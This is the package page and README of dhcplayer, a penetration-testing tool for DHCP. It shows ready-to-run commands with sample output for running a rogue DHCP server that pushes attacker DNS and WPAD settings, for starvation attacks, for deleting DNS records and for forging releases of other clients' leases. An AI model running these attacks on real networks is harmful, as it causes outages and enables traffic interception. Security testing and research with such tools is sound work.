10 releases
0.1.9 | Nov 28, 2023 |
---|---|
0.1.8 | Mar 17, 2023 |
0.1.4 | May 27, 2021 |
#752 in Network programming
41 downloads per month
110KB
3K
SLoC
DHCPlayer
dhcplayer is a tool to perform several actions using the DHCP protocol, both as client or server. It allows you to perform simple DHCP requests but also perform some known attacks like DHCP starvation or setting a rogue DHCP server.
In order to run dhcplayer, you need root
privileges to be able to create raw sockets.
Installation
To install:
$ cargo install dhcplayer
DHCP Server
You can create a DHCP server with the server
command. In the server you can use the parameters to configure the following options:
- Available IP Range
- Broadcast Address
- Network Mask
- Router/Gateway IP (by default your IP)
- DNS server IP(s) (by default your IP)
- WPAD file (disabled by default)
- NetBIOS/WINS name server (disabled by default)
$ sudo dhcplayer server -I eth0 -v --dns 192.168.122.5 --wpad http://wpadserver.local/wpad.dat --netbios 192.168.122.4 --start-ip 192.168.122.60 --end-ip 192.168.122.70
INFO - IP pool: 192.168.122.61-192.168.122.69
INFO - Mask: 255.255.255.0
INFO - Broadcast: 192.168.122.70
INFO - DHCP: 192.168.122.81
INFO - DNS: [192.168.122.5]
INFO - Router: [192.168.122.81]
INFO - Netbios: [192.168.122.4]
INFO - WPAD: http://wpadserver.local/wpad.dat
INFO - DISCOVER from 52:54:00:97:9a:b7
INFO - Offer 192.168.122.69
INFO - REQUEST from 52:54:00:97:9a:b7
INFO - Requested IP 192.168.122.69
INFO - ACK to 192.168.122.69 for 52:54:00:97:9a:b7
Starvation Attack
You can launch a DHCP Starvation attack against DHCP servers by using the starv
command.
The starv
command will request all the available IP addresses offered by the DHCP servers in the network. If you want to just target specific servers, you can use the servers
parameter.
$ sudo dhcplayer starv -I eth0 --server 192.168.122.1
192.168.122.80 90:25:4f:b0:51:04
192.168.122.118 eb:a3:fd:f4:26:d5
192.168.122.134 c6:f3:bd:ae:d9:ae
...
To stop the attack you need to press Ctrl-C. When the attack is stopped, by default, all the acquired IPs will be released. In case you don't want to release them, you can use the -n/--no-release
flag.
Discover
The discover command allows you to discover an request the IPs available from a DHCP server.
In the most basic use the command will request an IP from any DHCP server. If you want to request an specific server, you can use the server
parameter.
$ sudo dhcplayer discover -I eth0
ACK received from 192.168.122.81
Acquired IP: 192.168.122.67
Client MAC: 52:54:00:97:9a:b7
Options:
[54] DHCP Server ID: 192.168.122.81
[51] IP Address Lease Time: 3600
[58] Renewal Time: 1800
[59] Rebinding Time: 3150
[1] Subnet Mask: 255.255.255.0
[28] Broadcast Address: 192.168.122.70
[3] Router: 192.168.122.81
[6] Domain Server: 192.168.122.5
Discover DHCP servers
Moreover, you can send DISCOVER messages without requesting the IP addresses. You can do this with the -n/--no-request
flag. In that case, dhcplayer will listen for all the offers made by all the DHCP servers, if there are more than one in the network.
It can be useful to specify --options all
to request all the information from a DHCP server.
$ sudo dhcplayer discover -I eth0 -n --options all
OFFER received from 192.168.122.1
Offered IP: 192.168.122.82
Client MAC: 52:54:00:97:9a:b7
DHCP Server: 192.168.122.1
Options:
[54] DHCP Server ID: 192.168.122.1
[51] IP Address Lease Time: 3600
[58] Renewal Time: 1800
[59] Rebinding Time: 3150
[1] Subnet Mask: 255.255.255.0
[28] Broadcast Address: 192.168.122.255
[3] Router: 192.168.122.1
[6] Domain Server: 192.168.122.1
DNS Dynamic Update
You can ask the DHCP server to create a new DNS A record with the --dns-update
flag based on the hostname (-H/--hostname
) or the FQDN (Fully Qualified Domain Name) (--fqdn
). If you don't specify hostname nor FQDN, the DNS record will be deleted.
The server should return the server-update
flag in Client FQDN (81) if the update was successful.
sudo dhcplayer discover -I eth2 --dns-update -H test # Update based on hostname
sudo dhcplayer discover -I eth2 --dns-update --fqdn test.contoso.local # Update based on fqdn
sudo dhcplayer discover -I eth2 --dns-update # Delete DNS record
$ sudo dhcplayer discover -I eth2 --dns-update -H test
ACK received from 0.0.0.0
Acquired IP: 192.168.100.3
Client MAC: 52:54:00:88:80:0c
Options:
[58] Renewal Time: 345600
[59] Rebinding Time: 604800
[51] IP Address Lease Time: 691200
[54] DHCP Server ID: 192.168.100.2
[1] Subnet Mask: 255.255.255.0
[81] Client FQDN: flags: 0x1 (server-update) A-result: 255 PTR-result: 0
[3] Router: 192.168.100.2
[15] Domain Name: contoso.local
[6] Domain Server: 192.168.100.2
$ nslookup test.contoso.local 192.168.100.2
Server: 192.168.100.2
Address: 192.168.100.2#53
Name: test.contoso.local
Address: 192.168.100.3
$ sudo dhcplayer discover -I eth2 --dns-update
ACK received from 0.0.0.0
Acquired IP: 192.168.100.3
Client MAC: 52:54:00:88:80:0c
Options:
[58] Renewal Time: 345600
[59] Rebinding Time: 604800
[51] IP Address Lease Time: 691200
[54] DHCP Server ID: 192.168.100.2
[1] Subnet Mask: 255.255.255.0
[81] Client FQDN: flags: 0x1 (server-update) A-result: 255 PTR-result: 0
[3] Router: 192.168.100.2
[15] Domain Name: contoso.local
[6] Domain Server: 192.168.100.2
$ nslookup test.contoso.local 192.168.100.2
Server: 192.168.100.2
Address: 192.168.100.2#53
** server can't find test.contoso.local: NXDOMAIN
Inform
Additionally, you can send an INFORM petition instead of DISCOVER by using the -i/--inform
flag of the discover
command.
$ sudo dhcplayer discover -I eth0 -i --options wpad,dns --server 192.168.122.1 -v
INFO - INFORM sent - Client MAC 52:54:00:97:9a:b7
ACK received from 192.168.122.1
Acquired IP: 0.0.0.0
Client MAC: 52:54:00:97:9a:b7
Options:
[54] DHCP Server ID: 192.168.122.1
[1] Subnet Mask: 255.255.255.0
[28] Broadcast Address: 192.168.122.255
[6] Domain Server: 192.168.122.1
Release
You can use the release command
to release IPs that were acquired by you or other peer. For this you need to specify the IP and the MAC address of the client you want to release.
You can specify the pairs IP/MAC with the format <ip>-<mac>
. You can indicate the pairs in the command line, or pass them through a file or stdin.
$ sudo dhcplayer release -I eth2 --server 192.168.100.2 192.168.100.5-ca:2b:d1:21:17:86 192.168.100.7-fe:38:4e:46:95:d6 -v
INFO - RELEASE 192.168.100.5 ca:2b:d1:21:17:86
INFO - RELEASE 192.168.100.7 fe:38:4e:46:95:d6
You can also combine this command with an ARP scan to release the IPs of legit clients. The release clients probably continue using its IPs, but those are free to be assigned to other peer, which may cause some problems in the network.
$ sudo arplayer scan -I eth2 -w 10 | sudo dhcplayer release -I eth2 --server 192.168.100.2 -v
INFO - RELEASE 192.168.100.1 52:54:00:5b:49:5d
INFO - RELEASE 192.168.100.2 52:54:00:0b:75:57
INFO - RELEASE 192.168.100.7 52:54:00:a4:8c:f2
INFO - RELEASE 192.168.100.5 52:54:00:76:87:bb
Disclaimer
Please, don't use this tool for bad things. I won't assume any responsibility for your actions with this tool.
Dependencies
~9–18MB
~244K SLoC